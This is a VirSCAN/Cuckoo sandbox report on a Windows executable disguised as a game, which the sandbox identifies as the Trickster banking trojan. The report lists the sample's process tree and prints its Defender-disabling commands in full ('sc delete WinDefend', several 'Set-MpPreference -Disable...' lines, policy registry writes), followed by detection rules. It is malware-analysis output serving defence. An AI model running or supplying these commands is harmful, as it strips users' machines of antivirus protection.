VirSCAN

1, You can UPLOAD any files, but there is 20Mb limit per file.
2, VirSCAN supports Rar/Zip decompression, but it must be less than 20 files.
3, VirSCAN can scan password-protected compressed files with the password 'infected' or 'virus'.
4, If your browser cannot upload files, please download VirSCAN uploader to upload.


Basic Information

file name: 00少年三国志
file size: 1157511
file type: application/x-dosexec
MD5: 8985aede7d4774385ea89663b0c53324
sha1: 096723210c8f68f3849e3d6d822b291fa6911ffa

 CreateProcess

ApplicationName: C:\ProgramData\АахХееаВеАКе.exe
CmdLine: "C:\ProgramData\АахХееаВеАКе.exe"
childid: 3760
childname: АахХееаВеАКе.exe
childpath: C:\ProgramData\АахХееаВеАКе.exe
drop_type: 1
name: 1618626617310_8985aede7d4774385ea89663b0c53324.exe
noNeedLine: 1
path: C:\Users\Administrator\AppData\Local\Temp\1618626617310_8985aede7d4774385ea89663b0c53324.exe
pid: 3216
ApplicationName: C:\Windows\System32\cmd.exe
CmdLine: "C:\Windows\System32\cmd.exe" /c sc stop WinDefend
childid: 1348
childname: cmd.exe
childpath: C:\Windows\System32\cmd.exe
drop_type:
name: АахХееаВеАКе.exe
noNeedLine: 1
path: C:\ProgramData\АахХееаВеАКе.exe
pid: 3760
ApplicationName: C:\Windows\System32\cmd.exe
CmdLine: "C:\Windows\System32\cmd.exe" /c sc delete WinDefend
childid: 2524
childname: cmd.exe
childpath: C:\Windows\System32\cmd.exe
drop_type:
name: АахХееаВеАКе.exe
noNeedLine: 1
path: C:\ProgramData\АахХееаВеАКе.exe
pid: 3760
ApplicationName: C:\Windows\System32\cmd.exe
CmdLine: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
childid: 1676
childname: cmd.exe
childpath: C:\Windows\System32\cmd.exe
drop_type:
name: АахХееаВеАКе.exe
noNeedLine:
path: C:\ProgramData\АахХееаВеАКе.exe
pid: 3760
ApplicationName: C:\Windows\System32\cmd.exe
CmdLine: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableBehaviorMonitoring $true
childid: 828
childname: cmd.exe
childpath: C:\Windows\System32\cmd.exe
drop_type:
name: АахХееаВеАКе.exe
noNeedLine:
path: C:\ProgramData\АахХееаВеАКе.exe
pid: 3760
ApplicationName: C:\Windows\System32\cmd.exe
CmdLine: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableBlockAtFirstSeen $true
childid: 3100
childname: cmd.exe
childpath: C:\Windows\System32\cmd.exe
drop_type:
name: АахХееаВеАКе.exe
noNeedLine:
path: C:\ProgramData\АахХееаВеАКе.exe
pid: 3760
ApplicationName: C:\Windows\System32\cmd.exe
CmdLine: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableIOAVProtection $true
childid: 3204
childname: cmd.exe
childpath: C:\Windows\System32\cmd.exe
drop_type:
name: АахХееаВеАКе.exe
noNeedLine:
path: C:\ProgramData\АахХееаВеАКе.exe
pid: 3760
ApplicationName: C:\Windows\System32\cmd.exe
CmdLine: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisablePrivacyMode $true
childid: 3932
childname: cmd.exe
childpath: C:\Windows\System32\cmd.exe
drop_type:
name: АахХееаВеАКе.exe
noNeedLine:
path: C:\ProgramData\АахХееаВеАКе.exe
pid: 3760
ApplicationName: C:\Windows\System32\cmd.exe
CmdLine: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableIntrusionPreventionSystem $true
childid: 3840
childname: cmd.exe
childpath: C:\Windows\System32\cmd.exe
drop_type:
name: АахХееаВеАКе.exe
noNeedLine:
path: C:\ProgramData\АахХееаВеАКе.exe
pid: 3760
ApplicationName: C:\Windows\System32\cmd.exe
CmdLine: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -SevereThreatDefaultAction 6
childid: 3152
childname: cmd.exe
childpath: C:\Windows\System32\cmd.exe
drop_type:
name: АахХееаВеАКе.exe
noNeedLine:
path: C:\ProgramData\АахХееаВеАКе.exe
pid: 3760
ApplicationName: C:\Windows\System32\cmd.exe
CmdLine: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -LowThreatDefaultAction 6
childid: 3372
childname: cmd.exe
childpath: C:\Windows\System32\cmd.exe
drop_type:
name: АахХееаВеАКе.exe
noNeedLine:
path: C:\ProgramData\АахХееаВеАКе.exe
pid: 3760
ApplicationName: C:\Windows\System32\cmd.exe
CmdLine: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -ModerateThreatDefaultAction 6
childid: 1640
childname: cmd.exe
childpath: C:\Windows\System32\cmd.exe
drop_type:
name: АахХееаВеАКе.exe
noNeedLine:
path: C:\ProgramData\АахХееаВеАКе.exe
pid: 3760
ApplicationName: C:\Windows\System32\cmd.exe
CmdLine: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableScriptScanning $true
childid: 3044
childname: cmd.exe
childpath: C:\Windows\System32\cmd.exe
drop_type:
name: АахХееаВеАКе.exe
noNeedLine:
path: C:\ProgramData\АахХееаВеАКе.exe
pid: 3760
ApplicationName:
CmdLine: C:\Windows\system32\svchost.exe
childid: 252
childname: svchost.exe
childpath: C:\Windows\system32\svchost.exe
drop_type:
name: АахХееаВеАКе.exe
noNeedLine: 1
path: C:\ProgramData\АахХееаВеАКе.exe
pid: 3760
ApplicationName: C:\Windows\System32\sc.exe
CmdLine: sc stop WinDefend
childid: 3916
childname: sc.exe
childpath: C:\Windows\System32\sc.exe
drop_type:
name: cmd.exe
noNeedLine: 1
path: C:\Windows\System32\cmd.exe
pid: 1348
ApplicationName: C:\Windows\System32\sc.exe
CmdLine: sc delete WinDefend
childid: 2776
childname: sc.exe
childpath: C:\Windows\System32\sc.exe
drop_type:
name: cmd.exe
noNeedLine: 1
path: C:\Windows\System32\cmd.exe
pid: 2524
ApplicationName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CmdLine: powershell Set-MpPreference -DisableRealtimeMonitoring $true
childid: 1936
childname: powershell.exe
childpath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
drop_type:
name: cmd.exe
noNeedLine:
path: C:\Windows\System32\cmd.exe
pid: 1676
ApplicationName:
CmdLine:
childid: 3216
childname: 1618626617310_8985aede7d4774385ea89663b0c53324.exe
childpath: C:\Users\Administrator\AppData\Local\Temp\1618626617310_8985aede7d4774385ea89663b0c53324.exe
drop_type:
name:
noNeedLine:
path:
pid: 1804

 Summary

buffer: 1
processid: 3760
szSubkey: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender
type: REG_DWORD
valuename: DisableAntiSpyware
buffer: 1
processid: 3760
szSubkey: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection
type: REG_DWORD
valuename: DisableBehaviorMonitoring
buffer: 1
processid: 3760
szSubkey: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection
type: REG_DWORD
valuename: DisableOnAccessProtection
buffer: 1
processid: 3760
szSubkey: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection
type: REG_DWORD
valuename: DisableScanOnRealtimeEnable
buffer: 1
processid: 3760
szSubkey: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection
type: REG_DWORD
valuename: DisableIOAVProtection
buffer: zh-CN\x00zh-Hans\x00zh\x00en-US\x00en\x00\x00
processid: 1936
szSubkey: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885
type: REG_MULTI_SZ
valuename: HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\3a\AAF68885\LanguageList

 Dropped_Save

analysis_result: Safe
create: 0
how: del
md5: f0d966e1b04e76899ea834c7104e988c
name: 590aee7bdd69b59b.customDestinations-ms~RF113e361.TMP
new_size: 7960bytes
operation: File deleted after being dropped
path: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF113e361.TMP
processid: 1936
processname: powershell.exe
sha1: 206beb669bb361c808a303626791b2f60b9268de
sha256: 3467a5db9e17b826bd497880d4394943c7ce97f62d030fab404d00d6841a35f9
size: 7960
this_path: /data/cuckoo/storage/analyses/1000040/files/9398384719/590aee7bdd69b59b.customDestinations-ms~RF113e361.TMP
type: data
analysis_result: Safe
create: 0
how: write
md5: 2c85a3efc5d89b9a9948336669359f97
name: a18ca4003deb042bbee7a40f15e1970b_ff1996c6-1c32-48f3-a89c-1ab09b8477c7
new_size: 1036bytes
operation: File modified
path: C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3531488231-4160719598-983141384-500\a18ca4003deb042bbee7a40f15e1970b_ff1996c6-1c32-48f3-a89c-1ab09b8477c7
processid: 3760
processname: АахХееаВеАКе.exe
sha1: 1b4a3b30632b210c5613858d67cf88e8d59b1566
sha256: fda8796762e7fd4e9b6021d40edea335259eb10d584fb57aaca9f402e6eea82d
size: 1036
this_path: /data/cuckoo/storage/analyses/1000040/files/1001/a18ca4003deb042bbee7a40f15e1970b_ff1996c6-1c32-48f3-a89c-1ab09b8477c7
type: data
analysis_result: Safe
create: 0
how: move
md5: 2f9b5d72a83aea079b6d78a27b80ed5e
name: 590aee7bdd69b59b.customDestinations-ms
new_size: 7960bytes
operation: File copied over / overwritten
path: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
processid: 1936
processname: powershell.exe
sha1: 61da7d527a81923858d7a9a83d18b522f02a1ac9
sha256: 3511c908a31d0556c1b5f861e70540ff6293aa250c47504f0134e8f6926a9c6d
size: 7960
this_path: /data/cuckoo/storage/analyses/1000040/files/1002/590aee7bdd69b59b.customDestinations-ms
type: data

 Dropped Unsave

analysis_result: Trojan-Banker.Win32.Trickster.fdz
create: 0
how: copy
md5: 8985aede7d4774385ea89663b0c53324
name: АахХееаВеАКе.exe
new_size: 1130KB (1157511bytes)
operation: File copied over / overwritten
path: C:\ProgramData\АахХееаВеАКе.exe
processid: 3216
processname: 1618626617310_8985aede7d4774385ea89663b0c53324.exe
sha1: 096723210c8f68f3849e3d6d822b291fa6911ffa
sha256: edbfdd8ae0eb15206692c5a6314b2ee8bb8e669a15e2916fbf666c61deb5b1e8
size: 1157511
this_path: /data/cuckoo/storage/analyses/1000040/files/1000/АахХееаВеАКе.exe
type: PE32 executable (GUI) Intel 80386, for MS Windows

 Malicious

attck_tactics: Defense Evasion
level: 2
matchedinfo: The malware drops a file from its resource section and runs it, in order to hide malicious code
num: 12
process_id: 3216
process_name: 1618626617310_8985aede7d4774385ea89663b0c53324.exe
rulename: Drops and runs a file from the resource section
attck_tactics: Other malicious behavior
level: 1
matchedinfo: Generally used for file encryption or encrypted data transfer; may also be used in ransomware
num: 25
process_id: 3216
process_name: 1618626617310_8985aede7d4774385ea89663b0c53324.exe
rulename: Calls a cryptographic algorithm library
attck_tactics: Defense Evasion
level: 2
matchedinfo: The malware creates a hidden process that runs covertly in the background
num: 99
process_id: 3216
process_name: 1618626617310_8985aede7d4774385ea89663b0c53324.exe
rulename: Creates a hidden child process
attck_tactics: Defense Evasion
level: 2
matchedinfo: The malware drops a file from its resource section and runs it, in order to hide malicious code
num: 12
process_id: 3760
process_name: АахХееаВеАКе.exe
rulename: Drops and runs a file from the resource section
attck_tactics: Other malicious behavior
level: 2
matchedinfo: The malware loads a resource from its resource section into memory and decrypts it
num: 12
process_id: 3760
process_name: АахХееаВеАКе.exe
rulename: Loads a resource into memory
attck_tactics: Other malicious behavior
level: 1
matchedinfo: Generally used for file encryption or encrypted data transfer; may also be used in ransomware
num: 25
process_id: 3760
process_name: АахХееаВеАКе.exe
rulename: Calls a cryptographic algorithm library
attck_tactics: Other malicious behavior
level: 1
matchedinfo: The malware changes memory protection in order to decrypt and execute malicious code in memory
num: 29
process_id: 3760
process_name: АахХееаВеАКе.exe
rulename: Sets a memory region to readable/writable/executable
attck_tactics: Execution
level: 2
matchedinfo: The malware controls services by invoking the sc command-line tool, in order to create a malicious service or manipulate services
num: 185
process_id: 3760
process_name: АахХееаВеАКе.exe
rulename: Controls services (via the sc command line)
attck_tactics: Defense Evasion
level: 4
matchedinfo: Creates a process with a special process name to masquerade as a legitimate program, in order to confuse and deceive the user
num: 228
process_id: 3760
process_name: АахХееаВеАКе.exe
rulename: Creates a masquerading process
attck_tactics: Execution
level: 2
matchedinfo: The malware opens a thread in order to manipulate other threads
num: 2
process_id: 1348
process_name: cmd.exe
rulename: Opens another thread
attck_tactics: Basic information collection
level: 1
matchedinfo: Searches for specified target files by enumerating files
num: 62
process_id: 1348
process_name: cmd.exe
rulename: Enumerates files
attck_tactics: Execution
level: 2
matchedinfo: The malware controls services by invoking the sc command-line tool, in order to create a malicious service or manipulate services
num: 79
process_id: 1348
process_name: cmd.exe
rulename: Controls services (via the sc command line)
attck_tactics: Execution
level: 2
matchedinfo: The malware opens a thread in order to manipulate other threads
num: 2
process_id: 2524
process_name: cmd.exe
rulename: Opens another thread
attck_tactics: Basic information collection
level: 1
matchedinfo: Searches for specified target files by enumerating files
num: 62
process_id: 2524
process_name: cmd.exe
rulename: Enumerates files
attck_tactics: Execution
level: 2
matchedinfo: The malware controls services by invoking the sc command-line tool, in order to create a malicious service or manipulate services
num: 79
process_id: 2524
process_name: cmd.exe
rulename: Controls services (via the sc command line)
attck_tactics: Execution
level: 2
matchedinfo: The malware opens a thread in order to manipulate other threads
num: 2
process_id: 1676
process_name: cmd.exe
rulename: Opens another thread
attck_tactics: Basic information collection
level: 1
matchedinfo: Searches for specified target files by enumerating files
num: 62
process_id: 1676
process_name: cmd.exe
rulename: Enumerates files
attck_tactics: Persistence
level: 1
matchedinfo: The malware opens the Service Control Manager in order to control services
num: 2
process_id: 2776
process_name: sc.exe
rulename: Opens the Service Control Manager
attck_tactics: Persistence
level: 2
matchedinfo: The malware deletes a service in order to break normal system functionality
num: 4
process_id: 2776
process_name: sc.exe
rulename: Deletes a service
attck_tactics: Other malicious behavior
level: 1
matchedinfo: Generally used for file encryption or encrypted data transfer; may also be used in ransomware
num: 5423
process_id: 1936
process_name: powershell.exe
rulename: Calls a cryptographic algorithm library
attck_tactics: Other malicious behavior
level: 1
matchedinfo: The malware changes memory protection in order to decrypt and execute malicious code in memory
num: 5640
process_id: 1936
process_name: powershell.exe
rulename: Sets a memory region to readable/writable/executable
attck_tactics: Other malicious behavior
level: 2
matchedinfo: The malware loads a resource from its resource section into memory and decrypts it
num: 6404
process_id: 1936
process_name: powershell.exe
rulename: Loads a resource into memory